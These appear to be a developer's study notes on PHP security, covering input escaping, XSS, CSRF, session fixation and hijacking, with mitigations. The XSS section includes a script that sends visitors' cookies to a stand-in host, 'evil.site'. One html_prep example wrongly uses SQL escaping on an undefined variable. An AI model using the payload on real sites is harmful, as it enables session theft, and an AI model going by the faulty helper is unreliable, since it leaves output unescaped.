PHP -- filter

Notes toward a more systematic approach . . . .

Overlaps with FORMS.PHP. Decide what goes where.

In the first section, outline the various borders than need guarding:

$_GET, $_POST, $_REQUEST
$_COOKIE
$_SESSION
$_SERVER
database
files
RSS feeds

Preparing variables for MySQL and HTML output

function sql_prep( $arr, &$dbc ) {
	foreach ($arr as $k => $v) {
		$sql[$k] = $dbc->real_escape_string($v);
	}
	return $sql;
}
function html_prep($arr) {
	foreach ($arr as $k => $v) {
		$html[$k] = htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
	}
	return $html;
}

$sqlarr = sql_prep( $clean, $dbc );
$htmlarr = html_prep( $clean );

In this example, $clean provides the source for $sql and $html, but remains unchanged.

Alternatively, if the target arrays were passed by reference, you could fill them directly.

function sql_prep( $arr, &$sql, &$dbc ) {
	foreach ($arr as $k => $v) {
		$sql[$k] = $dbc->real_escape_string($v);
	}
}
function html_prep( $arr, &$html ) {
	foreach ($arr as $k => $v) {
		$html[$k] = $dbc->real_escape_string($v);
	}
}
$sqlarr=array();
$htmlarr=array();
sql_prep( $clean, $sqlarr, $dbc );
html_prep( $clean, $htmlarr );

That should conserve resources, since a temporary array isn't created and returned. But it tests slower. Hmm . . . .

A static class could consolidate the preparation for SQL and HTML use.

class getarray {
	static function tosql(&$v) {
		global $dbc;
		return $dbc->real_escape_string($v);
	}
	static function tohtml(&$v) {
		return htmlspecialchars($v,ENT_QUOTES);
	}
	static function _for( $type, &$inarr ) {
		$func='to'.$type; // create method name from $type arg
		foreach($inarr as $k=>$v) $outarr[$k]=self::$func($v); 
		return $outarr;
	}
}
$sqlarr=getarray::_for('sql',$clean);
$htmlarr=getarray::_for('html',$clean);

This cuts out duplication by removing the redundant foreach loops.

On the other hand, it inserts an extra function call inside a loop which you usually want to avoid.

possibly flesh out the following for quick reference

common types of attacks

Following notes from Chapter 2 of Chris Shiflett's PHP Security Guide.

semantic URL attacks

VECTOR: User rigs the URL to provide values that seem to come from a form.

GET request method susceptible to this, since the URL can be edited transparently.

PHP's $_SERVER['PHP_SELF'] reflects this tainted input naively. It's an open door into your application.

MITIGATION: Relies on working around the stateless protocol. Use session variables to test incoming data to insure the apparent submission really originated from your form. Example

session_start(); // form is being submitted
if (isset($_GET['user'])) { // user var might be rigged
	if (isset($_SESSION['verified'])) // is user verified from use of form previously?
	if ($_SESSION['user']==$_GET['user']) // do user names match?
}

file upload

VECTOR (theoretical—no known exploit in 2004): Naively trusting tmp_name (provided by PHP) could allow system files to be overwritten, e.g., if attacker managed to insert /etc/passwd or similar as value.

When a file is uploaded, PHP's $_FILES array contains the name, type, tmp_name, and size of the uploaded file.

It doesn't indicate the source of the file — who sent it from where.

MITIGATION:

test with is_uploaded_file(), if reading into memory
test with move_uploaded_file(), if copying to permanent location

XSS — cross-site scripting

VECTOR: Malicious location embedded in data — a "comment" field or URL GET variable.

User uploads this in TEXTAREA comment:

<script>
document.location='http://evil.site/steal.php?cookies=' + document.cookie
</script>

Users that "view" this comment send the cookies used by your app to evil.site, where steal.php examines GET['cookies'] for their data.

MITIGATION:

filter input with str_replace, preg_match, a ctype function, or one of PHP's filter types
output: htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8')

CSRF — cross-site request forgery

The forged request is sent by the unwitting victim.

VECTOR: Victim visits bad site that contains an IMG tag with a rigged SRC attribute.

The SRC string exploits a weakness in an app that lets a GET request change data (place orders, etc.).

session fixation

VECTOR: attacker lures victim to his page that contains a rigged element.

HREF in a link
HEADER('location:...')
REFRESH header
HTTP-EQUIV attribute in a meta tag

The element contains a link to your site and a session ID the attacker provides. This is a stepping stone to more dangerous attacks.

It works because, if a session doesn't already exist, PHP creates a new session ID using the ID supplied by the attacker.

MITIGATION: call session_regenerate_id() whenever a user's privilege changes.

By itself, session_regenerate_id() is not enough, since attacker can visit your site and see the new session ID it creates. If a new session ID is generated after user authenticates attacker can't discover it if he can't authenticate.

If attacker can lure victim to his evil site after user has authenticated, then what? (Probably that's covered in "session hijacking.")

session hijacking

VECTOR: attacker gains session ID and uses it to access your site from a different location

MITIGATION: consistency check — prompt for password if USER AGENT suddenly changes.

A typical HTTP request.

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

Same request from probable attacker.

GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234

A change in User-Agent is unlikely for legitimate user. Check for change this way.

<?php
session_start();
if ( isset( $_SESSION['HTTP_USER_AGENT'] ) ) {
	if ( $_SESSION['HTTP_USER_AGENT'] != md5( $_SERVER['HTTP_USER_AGENT'] ) ) {
		/* code here to prompt for password */
		exit;
	}
} else {
	// store hashed User-Agent for later comparison
	$_SESSION['HTTP_USER_AGENT'] = md5( $_SERVER['HTTP_USER_AGENT'] );
}
?>

However, if victim has visited attacker's site, he might have cookie data and be able to provide consistent HTTP headers.

Consider adding a random token to all internal links on your site. Each session gets token stored in $_SESSION array. Each link has $_SESSION['token'] appended to URL.

When attacker uses captured session ID, he requests URl w/out correct token ($_GET['token']) in URL.

The next section should probably go in a OBJECTS category.

:: vs ->

The arrow operator -> refers to an object's variable or function.

The scope resolution operator :: refers to a class's variable or function, or to a constant in a class or an object.

class myclass {
	public static $name='The original class string.';

	public static function dosomething() {
		return static::$name . ' returned by function';
	}
}

class myclass2 extends myclass {
		function dosomethingelse() { // can't override the static method of parent
			return self::dosomething() . ', via object.';
		}
}

$myobject = new myclass2;

echo "\n" . myclass::$name; // a static var in myclass
echo "\n" . myclass::dosomething(); // a static method in myclass
echo "\n" . myclass2::dosomething(); // a static method inherited by myclass2
echo "\n" . $myobject->dosomethingelse(); // a regular method in myobject

Because dosomething() is static, the "::" operator is used to call it.
Hence, self::dosomething() inside the dosomethingelse() method.

Because dosomethingelse() is not static, the "->" operator is used to call it.

filter variables